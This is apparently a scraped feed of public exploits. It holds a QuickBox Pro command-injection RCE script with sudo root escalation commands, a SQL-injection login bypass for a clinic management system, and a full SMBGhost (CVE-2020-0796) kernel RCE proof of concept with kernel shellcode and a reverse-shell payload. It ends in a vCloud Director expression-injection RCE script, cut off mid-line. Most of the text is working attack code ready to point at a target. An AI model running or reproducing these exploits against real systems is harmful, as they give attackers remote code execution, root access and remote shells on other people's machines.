"__main__": main()

3月5日3月5日

# Exploit Title: QuickBox Pro 2.1.8 - Authenticated Remote Code Execution # Date: 2020-05-26 # Exploit Author: s1gh # Vendor Homepage: https://quickbox.io/ # Vulnerability Details: https://s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/ # Version: <= 2.1.8 # Description: An authenticated low-privileged user can exploit a command injection vulnerability to get code-execution as www-data and escalate privileges to root due to weak sudo rules. # Tested on: Debian 9 # CVE: CVE-2020-13448 # References: https://github.com/s1gh/QuickBox-Pro-2.1.8-Authenticated-RCE ''' Privilege escalation: After getting a reverse shell as the www-data user you can escalate to root in one of two ways. 1. sudo mysql -e '\! /bin/sh' 2. sudo mount -o bind /bin/sh /bin/mount;sudo mount ''' #!/usr/bin/env python3 # -*- coding: utf-8 -*- import requests import argparse import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning from urllib.parse import quote_plus requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def exploit(args): s = requests.Session() print('[*] Sending our payload...') s.post('https://' + args.ip + '/inc/process.php', data={'username': args.username, 'password': args.password, 'form_submission': 'login'}, verify=False) try: s.get('https://' + args.ip + '/index.php?id=88&servicestart=a;' + quote_plus(args.cmd) + ';', verify=False) except requests.exceptions.ReadTimeout: pass def main(): parser = argparse.ArgumentParser(description="Authenticated RCE for QuickBox Pro <= v2.1.8") parser.add_argument('-i',dest='ip',required=True,help="Target IP Address") parser.add_argument('-u',dest='username',required=True,help="Username") parser.add_argument('-p',dest='password',required=True,help="Password") parser.add_argument('-c',dest='cmd', required=True, help="Command to execute") args = parser.parse_args() exploit(args) if __name__ == '__main__': main() sys.exit(0)

3月5日3月5日

# Exploit Title: Clinic Management System 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-06-02 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : login.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/source%20code/login.php POST /source%20code/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 72 Referer: http://localhost/source%20code/login.php Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1 Connection: keep-alive Upgrade-Insecure-Requests: 1 user=admin&email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btn_login=: undefined HTTP/1.1 200 OK Date: Mon, 01 Jun 2020 19:52:17 GMT Server: Apache/2.4.39 (Win64) PHP/7.2.18 X-Powered-By: PHP/7.2.18 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 4726 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

3月5日3月5日

#!/usr/bin/env python ''' # EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48537.zip # SMBGhost_RCE_PoC RCE PoC for CVE-2020-0796 "SMBGhost" For demonstration purposes only! Only use this a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die. Now that that's out of the way.... Usage ex: ``` $SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131 [+] found low stub at phys addr 13000! [+] PML4 at 1ad000 [+] base of HAL heap at fffff79480000000 [+] ntoskrnl entry at fffff80645792010 [+] found PML4 self-ref entry 1eb [+] found HalpInterruptController at fffff79480001478 [+] found HalpApicRequestInterrupt at fffff80645cb3bb0 [+] built shellcode! [+] KUSER_SHARED_DATA PTE at fffff5fbc0000000 [+] KUSER_SHARED_DATA PTE NX bit cleared! [+] Wrote shellcode at fffff78000000a00! [+] Press a key to execute shellcode! [+] overwrote HalpInterruptController pointer, should have execution shortly... ``` Replace payload in USER_PAYLOAD in exploit.py. Max of 600 bytes. If you want more, modify the kernel shell code yourself. lznt1 code from [here](https://github.com/you0708/lznt1). Modified to add a "bad compression" function to corrupt SRVNET buffer header without causing a crash. See this excellent write up by Ricera Security for more details on the methods I used: https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html ''' import sys import socket import struct import argparse from lznt1 import compress, compress_evil from smb_win import smb_negotiate, smb_compress # Use lowstub jmp bytes to signature search LOWSTUB_JMP = 0x1000600E9 # Offset of PML4 pointer in lowstub PML4_LOWSTUB_OFFSET = 0xA0 # Offset of lowstub virtual address in lowstub SELFVA_LOWSTUB_OFFSET = 0x78 # Offset of NTOSKRNL entry address in lowstub NTENTRY_LOWSTUB_OFFSET = 0x278 # Offset of hal!HalpApicRequestInterrupt pointer in hal!HalpInterruptController HALP_APIC_REQ_INTERRUPT_OFFSET = 0x78 KUSER_SHARED_DATA = 0xFFFFF78000000000 # Offset of pNetRawBuffer in SRVNET_BUFFER_HDR PNET_RAW_BUFF_OFFSET = 0x18 # Offset of pMDL1 in SRVNET_BUFFER_HDR PMDL1_OFFSET = 0x38 # Shellcode from kernel_shellcode.asm KERNEL_SHELLCODE = b"\x41\x50\x41\x51\x41\x55\x41\x57\x41\x56\x51\x52\x53\x56\x57\x4C" KERNEL_SHELLCODE += b"\x8D\x35\xA0\x02\x00\x00\x49\x8B\x86\xD0\x00\x00\x00\x49\x8B\x9E" KERNEL_SHELLCODE += b"\xD8\x00\x00\x00\x48\x89\x18\xFB\x49\x8B\x86\xE0\x00\x00\x00\x48" KERNEL_SHELLCODE += b"\x2D\x00\x10\x00\x00\x66\x81\x38\x4D\x5A\x75\xF3\x49\x89\xC7\x4D" KERNEL_SHELLCODE += b"\x89\xBE\xE0\x00\x00\x00\xBF\x78\x7C\xF4\xDB\xE8\xDA\x00\x00\x00" KERNEL_SHELLCODE += b"\x49\x89\xC5\xBF\x3F\x5F\x64\x77\xE8\x2E\x01\x00\x00\x48\x89\xC1" KERNEL_SHELLCODE += b"\xBF\xE1\x14\x01\x17\xE8\x21\x01\x00\x00\x48\x89\xC2\x48\x83\xC2" KERNEL_SHELLCODE += b"\x08\x49\x8D\x74\x0D\x00\xE8\xFF\x00\x00\x00\x3D\xD8\x83\xE0\x3E" KERNEL_SHELLCODE += b"\x74\x0A\x4D\x8B\x6C\x15\x00\x49\x29\xD5\xEB\xE5\xBF\x48\xB8\x18" KERNEL_SHELLCODE += b"\xB8\x4C\x89\xE9\xE8\x91\x00\x00\x00\x49\x89\x06\x4D\x8B\x4D\x30" KERNEL_SHELLCODE += b"\x4D\x8B\x45\x38\x49\x81\xE8\xF8\x02\x00\x00\x48\x31\xF6\x49\x81" KERNEL_SHELLCODE += b"\xE9\xF8\x02\x00\x00\x41\x8B\x79\x74\x0F\xBA\xE7\x04\x73\x05\x4C" KERNEL_SHELLCODE += b"\x89\xCE\xEB\x0C\x4D\x39\xC8\x4D\x8B\x89\xF8\x02\x00\x00\x75\xDE" KERNEL_SHELLCODE += b"\x48\x85\xF6\x74\x40\x49\x8D\x4E\x08\x48\x89\xF2\x4D\x31\xC0\x4C" KERNEL_SHELLCODE += b"\x8D\x0D\xB9\x00\x00\x00\x52\x41\x50\x41\x50\x41\x50\xBF\xC4\x5C" KERNEL_SHELLCODE += b"\x19\x6D\x48\x83\xEC\x20\xE8\x2F\x00\x00\x00\x48\x83\xC4\x40\x49" KERNEL_SHELLCODE += b"\x8D\x4E\x08\xBF\x34\x46\xCC\xAF\x48\x83\xEC\x20\xE8\x19\x00\x00" KERNEL_SHELLCODE += b"\x00\x48\x83\xC4\x20\xFA\x48\x89\xD8\x5F\x5E\x5B\x5A\x59\x41\x5E" KERNEL_SHELLCODE += b"\x41\x5F\x41\x5D\x41\x59\x41\x58\xFF\xE0\xE8\x02\x00\x00\x00\xFF" KERNEL_SHELLCODE += b"\xE0\x53\x51\x56\x41\x8B\x47\x3C\x4C\x01\xF8\x8B\x80\x88\x00\x00" KERNEL_SHELLCODE += b"\x00\x4C\x01\xF8\x50\x8B\x48\x18\x8B\x58\x20\x4C\x01\xFB\xFF\xC9" KERNEL_SHELLCODE += b"\x8B\x34\x8B\x4C\x01\xFE\xE8\x1F\x00\x00\x00\x39\xF8\x75\xEF\x58" KERNEL_SHELLCODE += b"\x8B\x58\x24\x4C\x01\xFB\x66\x8B\x0C\x4B\x8B\x58\x1C\x4C\x01\xFB" KERNEL_SHELLCODE += b"\x8B\x04\x8B\x4C\x01\xF8\x5E\x59\x5B\xC3\x52\x31\xC0\x99\xAC\xC1" KERNEL_SHELLCODE += b"\xCA\x0D\x01\xC2\x85\xC0\x75\xF6\x92\x5A\xC3\xE8\xA1\xFF\xFF\xFF" KERNEL_SHELLCODE += b"\x80\x78\x02\x80\x77\x05\x0F\xB6\x40\x03\xC3\x8B\x40\x03\xC3\x41" KERNEL_SHELLCODE += b"\x57\x41\x56\x57\x56\x48\x8B\x05\x0A\x01\x00\x00\x48\x8B\x48\x18" KERNEL_SHELLCODE += b"\x48\x8B\x49\x20\x48\x8B\x09\x66\x83\x79\x48\x18\x75\xF6\x48\x8B" KERNEL_SHELLCODE += b"\x41\x50\x81\x78\x0C\x33\x00\x32\x00\x75\xE9\x4C\x8B\x79\x20\xBF" KERNEL_SHELLCODE += b"\x5E\x51\x5E\x83\xE8\x58\xFF\xFF\xFF\x49\x89\xC6\x4C\x8B\x3D\xB3" KERNEL_SHELLCODE += b"\x01\x00\x00\x31\xC0\x44\x0F\x22\xC0\x48\x8D\x15\x8E\x01\x00\x00" KERNEL_SHELLCODE += b"\x89\xC1\x48\xF7\xD1\x49\x89\xC0\xB0\x40\x50\xC1\xE0\x06\x50\x49" KERNEL_SHELLCODE += b"\x89\x01\x48\x83\xEC\x20\xBF\xEA\x99\x6E\x57\xE8\x1A\xFF\xFF\xFF" KERNEL_SHELLCODE += b"\x48\x83\xC4\x30\x48\x8B\x3D\x63\x01\x00\x00\x48\x8D\x35\x77\x00" KERNEL_SHELLCODE += b"\x00\x00\xB9\x1D\x00\x00\x00\xF3\xA4\x48\x8D\x35\x6E\x01\x00\x00" KERNEL_SHELLCODE += b"\xB9\x58\x02\x00\x00\xF3\xA4\x48\x8D\x0D\xD8\x00\x00\x00\x65\x48" KERNEL_SHELLCODE += b"\x8B\x14\x25\x88\x01\x00\x00\x4D\x31\xC0\x4C\x8D\x0D\x46\x00\x00" KERNEL_SHELLCODE += b"\x00\x41\x50\x6A\x01\x48\x8B\x05\x22\x01\x00\x00\x50\x41\x50\x48" KERNEL_SHELLCODE += b"\x83\xEC\x20\xBF\xC4\x5C\x19\x6D\xE8\xBD\xFE\xFF\xFF\x48\x83\xC4" KERNEL_SHELLCODE += b"\x40\x48\x8D\x0D\x9E\x00\x00\x00\x4C\x89\xF2\x4D\x31\xC9\xBF\x34" KERNEL_SHELLCODE += b"\x46\xCC\xAF\x48\x83\xEC\x20\xE8\x9E\xFE\xFF\xFF\x48\x83\xC4\x20" KERNEL_SHELLCODE += b"\x5E\x5F\x41\x5E\x41\x5F\xC3\x90\xC3\x48\x92\x31\xC9\x51\x51\x49" KERNEL_SHELLCODE += b"\x89\xC9\x4C\x8D\x05\x0D\x00\x00\x00\x89\xCA\x48\x83\xEC\x20\xFF" KERNEL_SHELLCODE += b"\xD0\x48\x83\xC4\x30\xC3\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x00\x00" KERNEL_SHELLCODE += b"\x00\x00\x00\x00\x00\x00" # Reverse shell generated by msfvenom. Can you believe I had to download Kali Linux for this shit? USER_PAYLOAD = b"" USER_PAYLOAD += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41" USER_PAYLOAD += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48" USER_PAYLOAD += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f" USER_PAYLOAD += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c" USER_PAYLOAD += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52" USER_PAYLOAD += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b" USER_PAYLOAD += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0" USER_PAYLOAD += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56" USER_PAYLOAD += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9" USER_PAYLOAD += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0" USER_PAYLOAD += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58" USER_PAYLOAD += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44" USER_PAYLOAD += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0" USER_PAYLOAD += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" USER_PAYLOAD += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" USER_PAYLOAD += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32" USER_PAYLOAD += b"\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec" USER_PAYLOAD += b"\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x7a\x69" USER_PAYLOAD += b"\xc0\xa8\x8e\x01\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41" USER_PAYLOAD += b"\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01" USER_PAYLOAD += b"\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x50\x50" USER_PAYLOAD += b"\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48" USER_PAYLOAD += b"\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5" USER_PAYLOAD += b"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9" USER_PAYLOAD += b"\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02" USER_PAYLOAD += b"\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00\x41" USER_PAYLOAD += b"\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0\x6a" USER_PAYLOAD += b"\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01" USER_PAYLOAD += b"\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50" USER_PAYLOAD += b"\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff" USER_PAYLOAD += b"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86" USER_PAYLOAD += b"\xff\xd5\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08" USER_PAYLOAD += b"\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6" USER_PAYLOAD += b"\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a" USER_PAYLOAD += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59" USER_PAYLOAD += b"\x41\x89\xda\xff\xd5" PML4_SELFREF = 0 PHAL_HEAP = 0 PHALP_INTERRUPT = 0 PHALP_APIC_INTERRUPT = 0 PNT_ENTRY = 0 max_read_retry = 3 overflow_val = 0x1100 write_unit = 0xd0 pmdl_va = KUSER_SHARED_DATA + 0x900 pmdl_mapva = KUSER_SHARED_DATA + 0x800 pshellcodeva = KUSER_SHARED_DATA + 0xa00 class MDL: def __init__(self, map_va, phys_addr): self.next = struct.pack("<Q", 0x0) self.size = struct.pack("<H", 0x40) self.mdl_flags = struct.pack("<H", 0x5004) self.alloc_processor = struct.pack("<H", 0x0) self.reserved = struct.pack("<H", 0x0) self.process = struct.pack("<Q", 0x0) self.map_va = struct.pack("<Q", map_va) map_va &= ~0xFFF self.start_va = struct.pack("<Q", map_va) self.byte_count = struct.pack("<L", 0x1100) self.byte_offset = struct.pack("<L", (phys_addr & 0xFFF) + 0x4) phys_addr_enc = (phys_addr & 0xFFFFFFFFFFFFF000) >> 12 self.phys_addr1 = struct.pack("<Q", phys_addr_enc) self.phys_addr2 = struct.pack("<Q", phys_addr_enc) self.phys_addr3 = struct.pack("<Q", phys_addr_enc) def raw_bytes(self): mdl_bytes = self.next + self.size + self.mdl_flags + \ self.alloc_processor + self.reserved + self.process + \ self.map_va + self.start_va + self.byte_count + \ self.byte_offset + self.phys_addr1 + self.phys_addr2 + \ self.phys_addr3 return mdl_bytes def reconnect(ip, port): sock = socket.socket(socket.AF_INET) sock.settimeout(7) sock.connect((ip, port)) return sock def write_primitive(ip, port, data, addr): sock = reconnect(ip, port) smb_negotiate(sock) sock.recv(1000) uncompressed_data = b"\x41"*(overflow_val - len(data)) uncompressed_data += b"\x00"*PNET_RAW_BUFF_OFFSET uncompressed_data += struct.pack('<Q', addr) compressed_data = compress(uncompressed_data) smb_compress(sock, compressed_data, 0xFFFFFFFF, data) sock.close() def write_srvnet_buffer_hdr(ip, port, data, offset): sock = reconnect(ip, port) smb_negotiate(sock) sock.recv(1000) compressed_data = compress_evil(data) dummy_data = b"\x33"*(overflow_val + offset) smb_compress(sock, compressed_data, 0xFFFFEFFF, dummy_data) sock.close() def read_physmem_primitive(ip, port, phys_addr): i = 0 while i < max_read_retry: i += 1 buff = try_read_physmem_primitive(ip, port, phys_addr) if buff is not None: return buff def try_read_physmem_primitive(ip, port, phys_addr): fake_mdl = MDL(pmdl_mapva, phys_addr).raw_bytes() write_primitive(ip, port, fake_mdl, pmdl_va) write_srvnet_buffer_hdr(ip, port, struct.pack('<Q', pmdl_va), PMDL1_OFFSET) i = 0 while i < max_read_retry: i += 1 sock = reconnect(ip, port) smb_negotiate(sock) buff = sock.recv(1000) sock.close() if buff[4:8] != b"\xfeSMB": return buff def get_phys_addr(ip, port, va_addr): pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1))) pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1))) pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1))) pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1))) pml4e = PML4 + pml4_index*0x8 pdpt_buff = read_physmem_primitive(ip, port, pml4e) if pdpt_buff is None: sys.exit("[-] physical read primitive failed") pdpt = struct.unpack("<Q", pdpt_buff[0:8])[0] & 0xFFFFF000 pdpte = pdpt + pdpt_index*0x8 pdt_buff = read_physmem_primitive(ip, port, pdpte) if pdt_buff is None: sys.exit("[-] physical read primitive failed") pdt = struct.unpack("<Q", pdt_buff[0:8])[0] & 0xFFFFF000 pdte = pdt + pdt_index*0x8 pt_buff = read_physmem_primitive(ip, port, pdte) if pt_buff is None: sys.exit("[-] physical read primitive failed") pt = struct.unpack("<Q", pt_buff[0:8])[0] if pt & (1 << (8 - 1)): phys_addr = (pt & 0xFFFFF000) + (pt_index & 0xFFF)*0x1000 + (va_addr & 0xFFF) return phys_addr else: pt = pt & 0xFFFFF000 pte = pt + pt_index*0x8 pte_buff = read_physmem_primitive(ip, port, pte) if pte_buff is None: sys.exit("[-] physical read primitive failed") phys_addr = (struct.unpack("<Q", pte_buff[0:8])[0] & 0xFFFFF000) + \ (va_addr & 0xFFF) return phys_addr def get_pte_va(addr): pt = addr >> 9 lb = (0xFFFF << 48) | (PML4_SELFREF << 39) ub = ((0xFFFF << 48) | (PML4_SELFREF << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8 pt = pt | lb pt = pt & ub return pt def overwrite_pte(ip, port, addr): phys_addr = get_phys_addr(ip, port, addr) buff = read_physmem_primitive(ip, port, phys_addr) if buff is None: sys.exit("[-] read primitive failed!") pte_val = struct.unpack("<Q", buff[0:8])[0] # Clear NX bit overwrite_val = pte_val & (((1 << 63) - 1)) overwrite_buff = struct.pack("<Q", overwrite_val) write_primitive(ip, port, overwrite_buff, addr) def build_shellcode(): global KERNEL_SHELLCODE KERNEL_SHELLCODE += struct.pack("<Q", PHALP_INTERRUPT + HALP_APIC_REQ_INTERRUPT_OFFSET) KERNEL_SHELLCODE += struct.pack("<Q", PHALP_APIC_INTERRUPT) KERNEL_SHELLCODE += struct.pack("<Q", PNT_ENTRY & 0xFFFFFFFFFFFFF000) KERNEL_SHELLCODE += USER_PAYLOAD def search_hal_heap(ip, port): global PHALP_INTERRUPT global PHALP_APIC_INTERRUPT search_len = 0x10000 index = PHAL_HEAP page_index = PHAL_HEAP cons = 0 phys_addr = 0 while index < PHAL_HEAP + search_len: # It seems that pages in the HAL heap are not necessarily contiguous in physical memory, # so we try to reduce number of reads like this if not (index & 0xFFF): phys_addr = get_phys_addr(ip, port, index) else: phys_addr = (phys_addr & 0xFFFFFFFFFFFFF000) + (index & 0xFFF) buff = read_physmem_primitive(ip, port, phys_addr) if buff is None: sys.exit("[-] physical read primitive failed!") entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1) i = 0 # This heuristic seems to be OK to find HalpInterruptController, but could use improvement while i < entry_indices: entry = struct.unpack("<Q", buff[i:i+8])[0] i += 8 if (entry & 0xFFFFFF0000000000) != 0xFFFFF80000000000: cons = 0 continue cons += 1 if cons > 3: PHALP_INTERRUPT = index + i - 0x40 print("[+] found HalpInterruptController at %lx" % PHALP_INTERRUPT) if len(buff) < i + 0x40: buff = read_physmem_primitive(ip, port, index + i + 0x38) PHALP_APIC_INTERRUPT = struct.unpack("<Q", buff[0:8])[0] if buff is None: sys.exit("[-] physical read primitive failed!") else: PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0] print("[+] found HalpApicRequestInterrupt at %lx" % PHALP_APIC_INTERRUPT) return index += entry_indices sys.exit("[-] failed to find HalpInterruptController!") def search_selfref(ip, port): search_len = 0x1000 index = PML4 while search_len: buff = read_physmem_primitive(ip, port, index) if buff is None: return entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1) i = 0 while i < entry_indices: entry = struct.unpack("<Q",buff[i:i+8])[0] & 0xFFFFF000 if entry == PML4: return index + i i += 8 search_len -= entry_indices index += entry_indices def find_pml4_selfref(ip, port): global PML4_SELFREF self_ref = search_selfref(ip, port) if self_ref is None: sys.exit("[-] failed to find PML4 self reference entry!") PML4_SELFREF = (self_ref & 0xFFF) >> 3 print("[+] found PML4 self-ref entry %0x" % PML4_SELFREF) def find_low_stub(ip, port): global PML4 global PHAL_HEAP global PNT_ENTRY limit = 0x100000 index = 0x1000 while index < limit: buff = read_physmem_primitive(ip, port, index) if buff is None: sys.exit("[-] physical read primitive failed!") entry = struct.unpack("<Q", buff[0:8])[0] & 0xFFFFFFFFFFFF00FF if entry == LOWSTUB_JMP: print("[+] found low stub at phys addr %lx!" % index) PML4 = struct.unpack("<Q", buff[PML4_LOWSTUB_OFFSET: PML4_LOWSTUB_OFFSET + 8])[0] print("[+] PML4 at %lx" % PML4) PHAL_HEAP = struct.unpack("<Q", buff[SELFVA_LOWSTUB_OFFSET:SELFVA_LOWSTUB_OFFSET + 8])[0] & 0xFFFFFFFFF0000000 print("[+] base of HAL heap at %lx" % PHAL_HEAP) buff = read_physmem_primitive(ip, port, index + NTENTRY_LOWSTUB_OFFSET) if buff is None: sys.exit("[-] physical read primitive failed!") PNT_ENTRY = struct.unpack("<Q", buff[0:8])[0] print("[+] ntoskrnl entry at %lx" % PNT_ENTRY) return index += 0x1000 sys.exit("[-] Failed to find low stub in physical memory!") def do_rce(ip, port): find_low_stub(ip, port) find_pml4_selfref(ip, port) search_hal_heap(ip, port) build_shellcode() print("[+] built shellcode!") pKernelUserSharedPTE = get_pte_va(KUSER_SHARED_DATA) print("[+] KUSER_SHARED_DATA PTE at %lx" % pKernelUserSharedPTE) overwrite_pte(ip, port, pKernelUserSharedPTE) print("[+] KUSER_SHARED_DATA PTE NX bit cleared!") # TODO: figure out why we can't write the entire shellcode data at once. There is a check before srv2!Srv2DecompressData preventing the call of the function. to_write = len(KERNEL_SHELLCODE) write_bytes = 0 while write_bytes < to_write: write_sz = min([write_unit, to_write - write_bytes]) write_primitive(ip, port, KERNEL_SHELLCODE[write_bytes:write_bytes + write_sz], pshellcodeva + write_bytes) write_bytes += write_sz print("[+] Wrote shellcode at %lx!" % pshellcodeva) input("[+] Press a key to execute shellcode!") write_primitive(ip, port, struct.pack("<Q", pshellcodeva), PHALP_INTERRUPT + HALP_APIC_REQ_INTERRUPT_OFFSET) print("[+] overwrote HalpInterruptController pointer, should have execution shortly...") if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-ip", help="IP address of target", required=True) parser.add_argument("-p", "--port", default=445, help="SMB port, \ default: 445", required=False, type=int) args = parser.parse_args() do_rce(args.ip, args.port)

3月5日3月5日

#!/usr/bin/python # Exploit Title: vCloud Director - Remote Code Execution # Exploit Author: Tomas Melicher # Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/ # Date: 2020-05-24 # Vendor Homepage: https://www.vmware.com/ # Software Link: https://www.vmware.com/products/cloud-director.html # Tested On: vCloud Director 9.7.0.15498291 # Vulnerability Description: # VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name. import argparse # pip install argparse import base64, os, re, requests, sys if sys.version_info >= (3, 0): from urllib.parse import urlparse else: from urlparse import urlparse from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}" session = requests.Session() def login(url, username, password, verbose): target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path) res = session.get(target_url) match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE) if match: tenant = match.group(1) else: print('[!] can\'t find tenant identifier') return (None,None,None,None) if verbose: print('[*] tenant: %s'%(tenant)) match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE) if match: # Cloud Director 9.* login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0)) res = session.post(login_url, data={'username':username,'password':password}) if res.status_code == 401: print('[!] invalid credentials') return (None,None,None,None) else: # Cloud Director 10.* match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE) if match: login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0)) headers = { 'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))), 'Accept': 'application/json;version=29.0', 'Content-type': 'application/json;version=29.0' } res = session.post(login_url, headers=headers) if res.status_code == 401: print('[!] invalid credentials') return (None,None,None,None) else: print('[!] url for login form was not found') return (None,None,None,None) cookies = session.cookies.get_dict() jwt = cookies['vcloud_jwt'] session_id = cookies['vcloud_session_id'] if verbose: print('[*] jwt token: %s'%(jwt)) print('[*] session_id: %s'%(session_id)) res = session.get(target_url) match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE) if match is None: print('[!] organization not found') return (None,None,None,None) organization = match.group(1) if verbose: print('[*] organization name: %s'%(organization)) match = re.search(r'orgId : 